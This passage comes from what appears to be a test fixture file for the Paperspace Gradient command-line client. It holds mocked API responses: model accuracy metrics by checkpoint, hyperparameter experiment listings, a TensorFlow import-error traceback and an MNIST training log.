"value": 0, "checkpoint": 3471 }, { "value": 0, "checkpoint": 4606 }, { "value": 0, "checkpoint": 5785 }, { "value": 0, "checkpoint": 6956 }, { "value": 0, "checkpoint": 8116 }, { "value": 0, "checkpoint": 9262 }, { "value": 0, "checkpoint": 10397 }, { "value": 0, "checkpoint": 11566 }, { "value": 0, "checkpoint": 12000 } ] } ], "scalar": "loss" }, { "data": [ { "operation": "mean", "checkpoints": [ { "value": 0.9804999828338623, "checkpoint": 1175 }, { "value": 0.9872000217437744, "checkpoint": 2323 }, { "value": 0.9904000163078308, "checkpoint": 3471 }, { "value": 0.9912999868392944, "checkpoint": 4606 }, { "value": 0.9919999837875366, "checkpoint": 5785 }, { "value": 0.991599977016449, "checkpoint": 6956 }, { "value": 0.992900013923645, "checkpoint": 8116 }, { "value": 0.9922000169754028, "checkpoint": 9262 }, { "value": 0.9930999875068665, "checkpoint": 10397 }, { "value": 0.9926000237464905, "checkpoint": 11566 }, { "value": 0.991100013256073, "checkpoint": 12000 } ] }, { "operation": "amin", "checkpoints": [ { "value": 0.9804999828338623, "checkpoint": 1175 }, { "value": 0.9872000217437744, "checkpoint": 2323 }, { "value": 0.9904000163078308, "checkpoint": 3471 }, { "value": 0.9912999868392944, "checkpoint": 4606 }, { "value": 0.9919999837875366, "checkpoint": 5785 }, { "value": 0.991599977016449, "checkpoint": 6956 }, { "value": 0.992900013923645, "checkpoint": 8116 }, { "value": 0.9922000169754028, "checkpoint": 9262 }, { "value": 0.9930999875068665, "checkpoint": 10397 }, { "value": 0.9926000237464905, "checkpoint": 11566 }, { "value": 0.991100013256073, "checkpoint": 12000 } ] }, { "operation": "amax", "checkpoints": [ { "value": 0.9804999828338623, "checkpoint": 1175 }, { "value": 0.9872000217437744, "checkpoint": 2323 }, { "value": 0.9904000163078308, "checkpoint": 3471 }, { "value": 0.9912999868392944, "checkpoint": 4606 }, { "value": 0.9919999837875366, "checkpoint": 5785 }, { "value": 0.991599977016449, "checkpoint": 6956 }, { "value": 0.992900013923645, "checkpoint": 8116 }, { "value": 0.9922000169754028, "checkpoint": 9262 }, { "value": 0.9930999875068665, "checkpoint": 10397 }, { "value": 0.9926000237464905, "checkpoint": 11566 }, { "value": 0.991100013256073, "checkpoint": 12000 } ] }, { "operation": "median", "checkpoints": [ { "value": 0.9804999828338623, "checkpoint": 1175 }, { "value": 0.9872000217437744, "checkpoint": 2323 }, { "value": 0.9904000163078308, "checkpoint": 3471 }, { "value": 0.9912999868392944, "checkpoint": 4606 }, { "value": 0.9919999837875366, "checkpoint": 5785 }, { "value": 0.991599977016449, "checkpoint": 6956 }, { "value": 0.992900013923645, "checkpoint": 8116 }, { "value": 0.9922000169754028, "checkpoint": 9262 }, { "value": 0.9930999875068665, "checkpoint": 10397 }, { "value": 0.9926000237464905, "checkpoint": 11566 }, { "value": 0.991100013256073, "checkpoint": 12000 } ] }, { "operation": "std", "checkpoints": [ { "value": 0, "checkpoint": 1175 }, { "value": 0, "checkpoint": 2323 }, { "value": 0, "checkpoint": 3471 }, { "value": 0, "checkpoint": 4606 }, { "value": 0, "checkpoint": 5785 }, { "value": 0, "checkpoint": 6956 }, { "value": 0, "checkpoint": 8116 }, { "value": 0, "checkpoint": 9262 }, { "value": 0, "checkpoint": 10397 }, { "value": 0, "checkpoint": 11566 }, { "value": 0, "checkpoint": 12000 } ] }, { "operation": "var", "checkpoints": [ { "value": 0, "checkpoint": 1175 }, { "value": 0, "checkpoint": 2323 }, { "value": 0, "checkpoint": 3471 }, { "value": 0, "checkpoint": 4606 }, { "value": 0, "checkpoint": 5785 }, { "value": 0, "checkpoint": 6956 }, { "value": 0, "checkpoint": 8116 }, { "value": 0, "checkpoint": 9262 }, { "value": 0, "checkpoint": 10397 }, { "value": 0, "checkpoint": 11566 }, { "value": 0, "checkpoint": 12000 } ] } ], "scalar": "accuracy" } ], "session": "eval" } ], "params": None, "url": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "notes": None, "isDeleted": False, "isPublic": False, "dtCreated": "2019-04-02T17:02:47.157Z", "dtModified": "2019-04-02T17:02:54.273Z", "dtUploaded": "2019-04-02T17:02:54.273Z", "dtDeleted": None, "modelPath": "/artifacts" } ], "total": 1, "displayTotal": 1 } LIST_OF_LOGS_FOR_JOB = [ { "line": 1, "timestamp": "2019-04-03T15:56:35.457Z", "message": "Traceback (most recent call last):" }, { "line": 2, "timestamp": "2019-04-03T15:56:35.458Z", "message": " File \"generate_figures.py\", line 15, in <module>" }, { "line": 3, "timestamp": "2019-04-03T15:56:35.458Z", "message": " import dnnlib.tflib as tflib" }, { "line": 4, "timestamp": "2019-04-03T15:56:35.458Z", "message": " File \"/paperspace/dnnlib/tflib/__init__.py\", line 8, in <module>" }, { "line": 5, "timestamp": "2019-04-03T15:56:35.458Z", "message": " from . import autosummary" }, { "line": 6, "timestamp": "2019-04-03T15:56:35.458Z", "message": " File \"/paperspace/dnnlib/tflib/autosummary.py\", line 31, in <module>" }, { "line": 7, "timestamp": "2019-04-03T15:56:35.458Z", "message": " from . import tfutil" }, { "line": 8, "timestamp": "2019-04-03T15:56:35.458Z", "message": " File \"/paperspace/dnnlib/tflib/tfutil.py\", line 34, in <module>" }, { "line": 9, "timestamp": "2019-04-03T15:56:35.458Z", "message": " def shape_to_list(shape: Iterable[tf.Dimension]) -> List[Union[int, None]]:" }, { "line": 10, "timestamp": "2019-04-03T15:56:35.458Z", "message": "AttributeError: module \'tensorflow\' has no attribute \'Dimension\'" }, { "line": 11, "timestamp": "2019-04-03T15:56:46.168Z", "message": "PSEOF" } ] LIST_HYPERPARAMETERS_RESPONSE_JSON = { "data": [ { "dtCreated": "2019-05-13T11:29:43.155736+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-05-13T11:29:43.155736+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 45987, "experimentTemplateId": 8, "experimentTypeId": 4, "handle": "es3dn6fu16r4kk", "id": 45980, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 1, "templateHistory": { "dtCreated": "2019-05-13T11:29:41.933178+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 45987, "params": { "is_preemptible": False, "name": "some_name", "ports": 5000, "project_handle": "pr4yxj956", "tuning_command": "some command", "worker_command": "some worker command", "worker_container": "some_container", "worker_count": 1, "worker_machine_type": "k80", "worker_use_dockerfile": False, "workspaceUrl": "none" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-05-13T11:29:40.196982+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-05-13T11:29:40.196982+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 45986, "experimentTemplateId": 8, "experimentTypeId": 4, "handle": "eshlqek7wzvrxa", "id": 45979, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 1, "templateHistory": { "dtCreated": "2019-05-13T11:29:38.882999+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 45986, "params": { "is_preemptible": False, "name": "some_name", "ports": 5000, "project_handle": "pr4yxj956", "tuning_command": "some command", "worker_command": "some worker command", "worker_container": "some_container", "worker_count": 1, "worker_machine_type": "k80", "worker_use_dockerfile": False, "workspaceUrl": "none" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-05-13T11:25:03.760490+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-05-13T11:25:03.760490+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 45985, "experimentTemplateId": 8, "experimentTypeId": 4, "handle": "esdwnui5qsk8qm", "id": 45978, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 1, "templateHistory": { "dtCreated": "2019-05-13T11:25:02.489045+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 45985, "params": { "is_preemptible": False, "name": "some_name", "ports": 5000, "project_handle": "pr4yxj956", "tuning_command": "some command", "worker_command": "some worker command", "worker_container": "some_container", "worker_count": 1, "worker_machine_type": "k80", "worker_use_dockerfile": False, "workspaceUrl": "none" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-05-13T11:23:53.803162+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-05-13T11:23:53.803162+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 45984, "experimentTemplateId": 8, "experimentTypeId": 4, "handle": "eshz1z9k37w4nm", "id": 45977, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 1, "templateHistory": { "dtCreated": "2019-05-13T11:23:52.778310+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 45984, "params": { "is_preemptible": False, "name": "some_name", "ports": 5000, "project_handle": "pr4yxj956", "tuning_command": "some command", "worker_command": "some worker command", "worker_container": "some_container", "worker_count": 1, "worker_machine_type": "k80", "worker_use_dockerfile": False, "workspaceUrl": "none" }, "triggerEvent": None, "triggerEventId": None } }, ], "message": "success", "meta": { "filter": [], "limit": 11, "offset": 0, "totalItems": 15 } } HYPERPARAMETERS_DETAILS_RESPONSE_JSON = { "data": { "dtCreated": "2019-05-13T10:57:32.828135+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-05-13T10:57:32.828135+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 45973, "experimentTemplateId": 8, "experimentTypeId": 4, "handle": "ess6t3fjs2hb1g", "id": 45966, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 1, "templateHistory": { "dtCreated": "2019-05-13T10:57:31.592657+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 45973, "params": { "is_preemptible": False, "name": "some_name", "ports": 5000, "project_handle": "pr4yxj956", "tuning_command": "some command", "worker_command": "some worker command", "worker_container": "some_container", "worker_count": 1, "worker_machine_type": "k80", "worker_use_dockerfile": False, "workspaceUrl": "none" }, "triggerEvent": None, "triggerEventId": None } }, "message": "success" } LIST_OF_LOGS_FOR_EXPERIMENT = [ { "jobId": "jsy2ibsz1l026y", "line": 1, "timestamp": "2019-07-08T12:40:59.139Z", "message": "2019-07-08 12:40:59.139494: I tensorflow/core/platform/cpu_feature_guard.cc:141] Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 FMA\n" }, { "jobId": "jsy2ibsz1l026y", "line": 2, "timestamp": "2019-07-08T12:40:59.271Z", "message": "2019-07-08 12:40:59.270783: I tensorflow/stream_executor/cuda/cuda_gpu_executor.cc:998] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero" }, { "jobId": "jsy2ibsz1l026y", "line": 3, "timestamp": "2019-07-08T12:40:59.271Z", "message": "2019-07-08 12:40:59.271379: I tensorflow/compiler/xla/service/service.cc:150] XLA service 0x5642a00 executing computations on platform CUDA. Devices:" }, { "jobId": "jsy2ibsz1l026y", "line": 4, "timestamp": "2019-07-08T12:40:59.271Z", "message": "2019-07-08 12:40:59.271427: I tensorflow/compiler/xla/service/service.cc:158] StreamExecutor device (0): Tesla K80, Compute Capability 3.7" }, { "jobId": "jsy2ibsz1l026y", "line": 5, "timestamp": "2019-07-08T12:40:59.274Z", "message": "2019-07-08 12:40:59.274589: I tensorflow/core/platform/profile_utils/cpu_utils.cc:94] CPU Frequency: 2200000000 Hz" }, { "jobId": "jsy2ibsz1l026y", "line": 6, "timestamp": "2019-07-08T12:40:59.275Z", "message": "2019-07-08 12:40:59.274952: I tensorflow/compiler/xla/service/service.cc:150] XLA service 0x56aba20 executing computations on platform Host. Devices:" }, { "jobId": "jsy2ibsz1l026y", "line": 7, "timestamp": "2019-07-08T12:40:59.275Z", "message": "2019-07-08 12:40:59.274983: I tensorflow/compiler/xla/service/service.cc:158] StreamExecutor device (0): \u003cundefined\u003e, \u003cundefined\u003e" }, { "jobId": "jsy2ibsz1l026y", "line": 8, "timestamp": "2019-07-08T12:40:59.275Z", "message": "2019-07-08 12:40:59.275358: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1433] Found device 0 with properties: " }, { "jobId": "jsy2ibsz1l026y", "line": 9, "timestamp": "2019-07-08T12:40:59.275Z", "message": "name: Tesla K80 major: 3 minor: 7 memoryClockRate(GHz): 0.8235" }, { "jobId": "jsy2ibsz1l026y", "line": 10, "timestamp": "2019-07-08T12:40:59.275Z", "message": "pciBusID: 0000:00:04.0" }, { "jobId": "jsy2ibsz1l026y", "line": 11, "timestamp": "2019-07-08T12:40:59.275Z", "message": "totalMemory: 11.17GiB freeMemory: 11.09GiB" }, { "jobId": "jsy2ibsz1l026y", "line": 12, "timestamp": "2019-07-08T12:40:59.275Z", "message": "2019-07-08 12:40:59.275392: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1512] Adding visible gpu devices: 0" }, { "jobId": "jsy2ibsz1l026y", "line": 13, "timestamp": "2019-07-08T12:40:59.276Z", "message": "2019-07-08 12:40:59.276439: I tensorflow/core/common_runtime/gpu/gpu_device.cc:984] Device interconnect StreamExecutor with strength 1 edge matrix:" }, { "jobId": "jsy2ibsz1l026y", "line": 14, "timestamp": "2019-07-08T12:40:59.276Z", "message": "2019-07-08 12:40:59.276473: I tensorflow/core/common_runtime/gpu/gpu_device.cc:990] 0 " }, { "jobId": "jsy2ibsz1l026y", "line": 15, "timestamp": "2019-07-08T12:40:59.276Z", "message": "2019-07-08 12:40:59.276483: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1003] 0: N " }, { "jobId": "jsy2ibsz1l026y", "line": 16, "timestamp": "2019-07-08T12:40:59.276Z", "message": "2019-07-08 12:40:59.276778: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1115] Created TensorFlow device (/device:GPU:0 with 10787 MB memory) -\u003e physical GPU (device: 0, name: Tesla K80, pci bus id: 0000:00:04.0, compute capability: 3.7)" }, { "jobId": "jsy2ibsz1l026y", "line": 17, "timestamp": "2019-07-08T12:40:59.28Z", "message": "WARNING: Logging before flag parsing goes to stderr." }, { "jobId": "jsy2ibsz1l026y", "line": 18, "timestamp": "2019-07-08T12:40:59.28Z", "message": "I0708 12:40:59.280403 140451862599424 mnist.py:265] ==================== Environment Variables ====================" }, { "jobId": "jsy2ibsz1l026y", "line": 19, "timestamp": "2019-07-08T12:40:59.28Z", "message": "I0708 12:40:59.280700 140451862599424 mnist.py:267] NVIDIA_VISIBLE_DEVICES: all" }, { "jobId": "jsy2ibsz1l026y", "line": 20, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.280864 140451862599424 mnist.py:267] PS_DOCKER_AGENT: 6136343261613365" }, { "jobId": "jsy2ibsz1l026y", "line": 21, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.280993 140451862599424 mnist.py:267] EVAL_SECS: 10" }, { "jobId": "jsy2ibsz1l026y", "line": 22, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281114 140451862599424 mnist.py:267] PATH: /usr/local/nvidia/bin:/usr/local/cuda/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" }, { "jobId": "jsy2ibsz1l026y", "line": 23, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281230 140451862599424 mnist.py:267] PS_HOST_PRIVATE_IP_ADDRESS: 10.138.0.15" }, { "jobId": "jsy2ibsz1l026y", "line": 24, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281354 140451862599424 mnist.py:267] PS_HOSTNAME: gradient-host-1562589161" }, { "jobId": "jsy2ibsz1l026y", "line": 25, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281510 140451862599424 mnist.py:267] HOSTNAME: 9b41cad9ccda" }, { "jobId": "jsy2ibsz1l026y", "line": 26, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281623 140451862599424 mnist.py:267] EPOCHS_EVAL: 5" }, { "jobId": "jsy2ibsz1l026y", "line": 27, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281736 140451862599424 mnist.py:267] PS_JOBSPACE: /storage" }, { "jobId": "jsy2ibsz1l026y", "line": 28, "timestamp": "2019-07-08T12:40:59.281Z", "message": "I0708 12:40:59.281847 140451862599424 mnist.py:267] PS_JOB_RUNNER: 1" }, { "jobId": "jsy2ibsz1l026y", "line": 29, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.281965 140451862599424 mnist.py:267] NVIDIA_REQUIRE_CUDA: cuda\u003e=10.0 brand=tesla,driver\u003e=384,driver\u003c385 brand=tesla,driver\u003e=410,driver\u003c411" }, { "jobId": "jsy2ibsz1l026y", "line": 30, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282079 140451862599424 mnist.py:267] CUDA_PKG_VERSION: 10-0=10.0.130-1" }, { "jobId": "jsy2ibsz1l026y", "line": 31, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282189 140451862599424 mnist.py:267] LD_LIBRARY_PATH: /usr/local/cuda/extras/CUPTI/lib64:/usr/local/nvidia/lib:/usr/local/nvidia/lib64" }, { "jobId": "jsy2ibsz1l026y", "line": 32, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282299 140451862599424 mnist.py:267] TYPE: master" }, { "jobId": "jsy2ibsz1l026y", "line": 33, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282416 140451862599424 mnist.py:267] PS_DATASETS: /datasets" }, { "jobId": "jsy2ibsz1l026y", "line": 34, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282531 140451862599424 mnist.py:267] TRAIN_EPOCHS: 10" }, { "jobId": "jsy2ibsz1l026y", "line": 35, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282641 140451862599424 mnist.py:267] MAX_STEPS: 1000" }, { "jobId": "jsy2ibsz1l026y", "line": 36, "timestamp": "2019-07-08T12:40:59.282Z", "message": "I0708 12:40:59.282753 140451862599424 mnist.py:267] PS_HOME: /paperspace" }, { "jobId": "jsy2ibsz1l026y", "line": 37, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.282861 140451862599424 mnist.py:267] INDEX: 0" }, { "jobId": "jsy2ibsz1l026y", "line": 38, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.282970 140451862599424 mnist.py:267] CUDA_VERSION: 10.0.130" }, { "jobId": "jsy2ibsz1l026y", "line": 39, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283078 140451862599424 mnist.py:267] PORTS: 5000" }, { "jobId": "jsy2ibsz1l026y", "line": 40, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283186 140451862599424 mnist.py:267] PS_ARTIFACTS: /artifacts" }, { "jobId": "jsy2ibsz1l026y", "line": 41, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283293 140451862599424 mnist.py:267] NVIDIA_DRIVER_CAPABILITIES: compute,utility" }, { "jobId": "jsy2ibsz1l026y", "line": 42, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283408 140451862599424 mnist.py:267] PS_HOST_PUBLIC_IP_ADDRESS: 35.233.198.134" }, { "jobId": "jsy2ibsz1l026y", "line": 43, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283516 140451862599424 mnist.py:267] LANG: C.UTF-8" }, { "jobId": "jsy2ibsz1l026y", "line": 44, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283623 140451862599424 mnist.py:267] PS_JOB_ID: jsy2ibsz1l026y" }, { "jobId": "jsy2ibsz1l026y", "line": 45, "timestamp": "2019-07-08T12:40:59.283Z", "message": "I0708 12:40:59.283730 140451862599424 mnist.py:267] HOME: /root" }, { "jobId": "jsy2ibsz1l026y", "line": 46, "timestamp": "2019-07-08T12:40:59.862Z", "message": "I0708 12:40:59.862003 140451862599424 run_config.py:532] Initializing RunConfig with distribution strategies." }, { "jobId": "jsy2ibsz1l026y", "line": 47, "timestamp": "2019-07-08T12:40:59.862Z", "message": "I0708 12:40:59.862317 140451862599424 estimator_training.py:166] Not using Distribute Coordinator." }, { "jobId": "jsy2ibsz1l026y", "line": 48, "timestamp": "2019-07-08T12:40:59.863Z", "message": "I0708 12:40:59.862842 140451862599424 estimator.py:201] Using config: {'_master': '', '_num_worker_replicas': 1, '_num_ps_replicas': 0, '_save_checkpoints_secs': None, '_log_step_count_steps': 100, '_train_distribute': \u003ctensorflow.contrib.distribute.python.one_device_strategy.OneDeviceStrategy object at 0x7fbcb5adecc0\u003e, '_protocol': None, '_session_config': allow_soft_placement: True" }, { "jobId": "jsy2ibsz1l026y", "line": 49, "timestamp": "2019-07-08T12:40:59.863Z", "message": ", '_tf_random_seed': None, '_global_id_in_cluster': 0, '_is_chief': True, '_keep_checkpoint_max': 5, '_keep_checkpoint_every_n_hours': 10000, '_model_dir': '/paperspace/models/mnist', '_save_summary_steps': 100, '_service': None, '_experimental_distribute': None, '_cluster_spec': \u003ctensorflow.python.training.server_lib.ClusterSpec object at 0x7fbcb34f7828\u003e, '_save_checkpoints_steps': 600, '_evaluation_master': '', '_eval_distribute': None, '_task_id': 0, '_distribute_coordinator_mode': None, '_task_type': 'worker', '_device_fn': None}" }, { "jobId": "jsy2ibsz1l026y", "line": 50, "timestamp": "2019-07-08T12:40:59.863Z", "message": "I0708 12:40:59.863682 140451862599424 estimator_training.py:185] Not using Distribute Coordinator." }, { "jobId": "jsy2ibsz1l026y", "line": 51, "timestamp": "2019-07-08T12:40:59.864Z", "message": "I0708 12:40:59.864074 140451862599424 training.py:610] Running training and evaluation locally (non-distributed)." }, { "jobId": "jsy2ibsz1l026y", "line": 52, "timestamp": "2019-07-08T12:40:59.864Z", "message": "I0708 12:40:59.864597 140451862599424 training.py:698] Start train and evaluate loop. The evaluate will happen after every checkpoint. Checkpoint frequency is determined based on RunConfig arguments: save_checkpoints_steps 600 or save_checkpoints_secs None." }, { "jobId": "jsy2ibsz1l026y", "line": 53, "timestamp": "2019-07-08T12:41:01.276Z", "message": "W0708 12:41:01.276278 140451862599424 deprecation.py:323] From /usr/local/lib/python3.5/dist-packages/tensorflow/python/data/ops/dataset_ops.py:1419: colocate_with (from tensorflow.python.framework.ops) is deprecated and will be removed in a future version." }, { "jobId": "jsy2ibsz1l026y", "line": 54, "timestamp": "2019-07-08T12:41:01.276Z", "message": "Instructions for updating:" }, { "jobId": "jsy2ibsz1l026y", "line": 55, "timestamp": "2019-07-08T12:41:01.276Z", "message": "Colocations handled automatically by placer." }, { "jobId": "jsy2ibsz1l026y", "line": 56, "timestamp": "2019-07-08T12:41:01.292Z", "message": "I0708 12:41:01.291953 140451862599424 estimator.py:1111] Calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 57, "timestamp": "2019-07-08T12:41:01.389Z", "message": "W0708 12:41:01.389566 140451862599424 deprecation.py:506] From /usr/local/lib/python3.5/dist-packages/tensorflow/python/keras/layers/core.py:143: calling dropout (from tensorflow.python.ops.nn_ops) with keep_prob is deprecated and will be removed in a future version." }, { "jobId": "jsy2ibsz1l026y", "line": 58, "timestamp": "2019-07-08T12:41:01.389Z", "message": "Instructions for updating:" }, { "jobId": "jsy2ibsz1l026y", "line": 59, "timestamp": "2019-07-08T12:41:01.389Z", "message": "Please use `rate` instead of `keep_prob`. Rate should be set to `rate = 1 - keep_prob`." }, { "jobId": "jsy2ibsz1l026y", "line": 60, "timestamp": "2019-07-08T12:41:01.537Z", "message": "W0708 12:41:01.536658 140451862599424 deprecation.py:323] From /usr/local/lib/python3.5/dist-packages/tensorflow/python/ops/losses/losses_impl.py:209: to_float (from tensorflow.python.ops.math_ops) is deprecated and will be removed in a future version." }, { "jobId": "jsy2ibsz1l026y", "line": 61, "timestamp": "2019-07-08T12:41:01.537Z", "message": "Instructions for updating:" }, { "jobId": "jsy2ibsz1l026y", "line": 62, "timestamp": "2019-07-08T12:41:01.537Z", "message": "Use tf.cast instead." }, { "jobId": "jsy2ibsz1l026y", "line": 63, "timestamp": "2019-07-08T12:41:01.86Z", "message": "I0708 12:41:01.860109 140451862599424 estimator.py:1113] Done calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 64, "timestamp": "2019-07-08T12:41:01.909Z", "message": "I0708 12:41:01.909625 140451862599424 basic_session_run_hooks.py:527] Create CheckpointSaverHook." }, { "jobId": "jsy2ibsz1l026y", "line": 65, "timestamp": "2019-07-08T12:41:02.104Z", "message": "I0708 12:41:02.104314 140451862599424 monitored_session.py:222] Graph was finalized." }, { "jobId": "jsy2ibsz1l026y", "line": 66, "timestamp": "2019-07-08T12:41:02.105Z", "message": "2019-07-08 12:41:02.105148: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1512] Adding visible gpu devices: 0" }, { "jobId": "jsy2ibsz1l026y", "line": 67, "timestamp": "2019-07-08T12:41:02.105Z", "message": "2019-07-08 12:41:02.105239: I tensorflow/core/common_runtime/gpu/gpu_device.cc:984] Device interconnect StreamExecutor with strength 1 edge matrix:" }, { "jobId": "jsy2ibsz1l026y", "line": 68, "timestamp": "2019-07-08T12:41:02.105Z", "message": "2019-07-08 12:41:02.105274: I tensorflow/core/common_runtime/gpu/gpu_device.cc:990] 0 " }, { "jobId": "jsy2ibsz1l026y", "line": 69, "timestamp": "2019-07-08T12:41:02.105Z", "message": "2019-07-08 12:41:02.105290: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1003] 0: N " }, { "jobId": "jsy2ibsz1l026y", "line": 70, "timestamp": "2019-07-08T12:41:02.105Z", "message": "2019-07-08 12:41:02.105612: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1115] Created TensorFlow device (/job:localhost/replica:0/task:0/device:GPU:0 with 10787 MB memory) -\u003e physical GPU (device: 0, name: Tesla K80, pci bus id: 0000:00:04.0, compute capability: 3.7)" }, { "jobId": "jsy2ibsz1l026y", "line": 71, "timestamp": "2019-07-08T12:41:03.052Z", "message": "I0708 12:41:03.051607 140451862599424 session_manager.py:491] Running local_init_op." }, { "jobId": "jsy2ibsz1l026y", "line": 72, "timestamp": "2019-07-08T12:41:03.064Z", "message": "I0708 12:41:03.064292 140451862599424 session_manager.py:493] Done running local_init_op." }, { "jobId": "jsy2ibsz1l026y", "line": 73, "timestamp": "2019-07-08T12:41:03.405Z", "message": "I0708 12:41:03.404671 140451862599424 basic_session_run_hooks.py:594] Saving checkpoints for 0 into /paperspace/models/mnist/model.ckpt." }, { "jobId": "jsy2ibsz1l026y", "line": 74, "timestamp": "2019-07-08T12:41:03.616Z", "message": "I0708 12:41:03.616098 140451862599424 util.py:164] Initialize strategy" }, { "jobId": "jsy2ibsz1l026y", "line": 75, "timestamp": "2019-07-08T12:41:03.715Z", "message": "2019-07-08 12:41:03.715695: I tensorflow/stream_executor/dso_loader.cc:152] successfully opened CUDA library libcublas.so.10.0 locally" }, { "jobId": "jsy2ibsz1l026y", "line": 76, "timestamp": "2019-07-08T12:41:09.915Z", "message": "I0708 12:41:09.915456 140451862599424 basic_session_run_hooks.py:249] cross_entropy = 2.3025289, learning_rate = 1e-04, train_accuracy = 0.08" }, { "jobId": "jsy2ibsz1l026y", "line": 77, "timestamp": "2019-07-08T12:41:09.916Z", "message": "I0708 12:41:09.915941 140451862599424 basic_session_run_hooks.py:249] loss = 2.3025289, step = 0" }, { "jobId": "jsy2ibsz1l026y", "line": 78, "timestamp": "2019-07-08T12:41:11.313Z", "message": "I0708 12:41:11.313229 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 71.5095" }, { "jobId": "jsy2ibsz1l026y", "line": 79, "timestamp": "2019-07-08T12:41:11.314Z", "message": "I0708 12:41:11.314374 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.3830725, learning_rate = 1e-04, train_accuracy = 0.49 (1.399 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 80, "timestamp": "2019-07-08T12:41:11.314Z", "message": "I0708 12:41:11.314673 140451862599424 basic_session_run_hooks.py:247] loss = 0.3830725, step = 100 (1.399 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 81, "timestamp": "2019-07-08T12:41:12.369Z", "message": "I0708 12:41:12.368999 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 94.7225" }, { "jobId": "jsy2ibsz1l026y", "line": 82, "timestamp": "2019-07-08T12:41:12.37Z", "message": "I0708 12:41:12.370402 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.19424663, learning_rate = 1e-04, train_accuracy = 0.6433333 (1.056 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 83, "timestamp": "2019-07-08T12:41:12.371Z", "message": "I0708 12:41:12.370768 140451862599424 basic_session_run_hooks.py:247] loss = 0.19424663, step = 200 (1.056 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 84, "timestamp": "2019-07-08T12:41:13.424Z", "message": "I0708 12:41:13.423866 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 94.7932" }, { "jobId": "jsy2ibsz1l026y", "line": 85, "timestamp": 